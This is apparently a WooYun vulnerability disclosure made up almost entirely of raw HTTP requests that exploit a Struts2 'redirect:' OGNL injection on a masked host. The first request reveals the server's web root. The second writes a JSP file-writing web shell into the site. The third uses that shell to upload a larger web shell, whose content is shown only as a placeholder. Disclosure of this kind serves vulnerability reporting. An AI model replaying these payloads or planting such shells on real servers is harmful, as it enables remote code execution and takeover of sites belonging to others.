WooYun.org

POST /main1.action HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9E8C1A55E69064893082E80E4A66D419; CNZZDATA3417230=cnzz_eid%3D7996912-1450007925-null%26ntime%3D1450014908
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 258
--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"
-1
--------------------------5423a63046c50524a84963968721

POST /main1.action HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9E8C1A55E69064893082E80E4A66D419; CNZZDATA3417230=cnzz_eid%3D7996912-1450007925-null%26ntime%3D1450014908
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 1127
--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("D:\\webroot\\spshebao\\homePage.jsp")).append("<%@ page language=\"java\" import=\"java.util.*,**.**.**.**.*\" pageEncoding=\"UTF-8\"%><%response.setCharacterEncoding(\"UTF-8\")\u003bServletOutputStream output = response.getOutputStream()\u003bString filePath = request.getParameter(\"filePath\")\u003bString filename = request.getRealPath(filePath)\u003b**.**.**.**.File f = new **.**.**.**.File(filename)\u003bif (!f.exists()){	f.getParentFile().mkdirs()\u003b}try {	OutputStream os = new FileOutputStream(filename)\u003b	PrintWriter writer = new PrintWriter(new OutputStreamWriter(os, \"UTF-8\"))\u003b	writer.print(request.getParameter(\"context\"))\u003b	writer.flush()\u003b	os.close()\u003b	writer.close()\u003b	out.clear()\u003b	out = pageContext.pushBody()\u003b} catch (**.**.**.**.IOException e) {	out.println(e.getMessage())\u003b}output.println(\"<result>OK</result>\")\u003boutput.flush()\u003boutput.close()\u003b	%>").close()}"
-1
--------------------------5423a63046c50524a84963968721

POST /homePage.jsp HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9E8C1A55E69064893082E80E4A66D419; CNZZDATA3417230=cnzz_eid%3D7996912-1450007925-null%26ntime%3D1450014908
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 75710
--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="filePath"
firstHomePage_bak.jsp
--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="context"
大马内容在此
--------------------------5423a63046c50524a84963968721